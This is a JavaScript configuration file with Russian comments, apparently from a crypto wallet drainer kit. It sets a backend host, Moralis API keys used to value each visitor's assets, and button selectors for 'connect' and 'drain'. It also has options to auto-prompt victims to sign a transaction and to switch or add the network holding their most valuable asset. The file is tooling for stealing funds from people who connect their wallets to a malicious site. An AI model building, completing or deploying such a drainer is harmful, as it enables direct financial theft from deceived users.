const SETTINGS = {
    // ------
    // --- Общие настройки
    // -----
    "BACKEND_HOST": "127.0.0.1:3000",         // -- Хост на котором находится backend
    "MORALIS_KEYS": [                       // -- Moralis API Keys (для каждого посетителя случайно выбирается один из ключей)
    ],
    "TOKENS_LIST": [                        // -- Если Moralis не доступен, то чекаем токены из списка напрямую
    ],
    // ------
    // --- Настройки подключения
    // ------
    "CONNECT": {
        "BUTTON_SELECTOR": ".connect-btn",  // -- Селектор кнопки подключения в DOM
        "AUTO": false                       // -- Предлагать подключиться сразу после загрузки страницы?     
    },
    // ------
    // --- Настройки дрейнера
    // ------
    "DRAIN": {
        "BUTTON_SELECTOR": ".drain-btn",    // -- Селектор кнопки дрейна в DOM
        "AUTO": false,                      // -- Предлагать подписать транзакцию сразу после подключения?
        "CHANGE_NETWORK": false,            // -- Предлагать сменить сеть на ту в которой находиться самый дорогой актив?
        "ADD_NETWORK": false,               // -- Предлагать добавить сеть в которой находиться самый дорогой актив?
        "USE_MORALIS": true                 // -- Использовать Moralis для определения стоимости активов
    }
}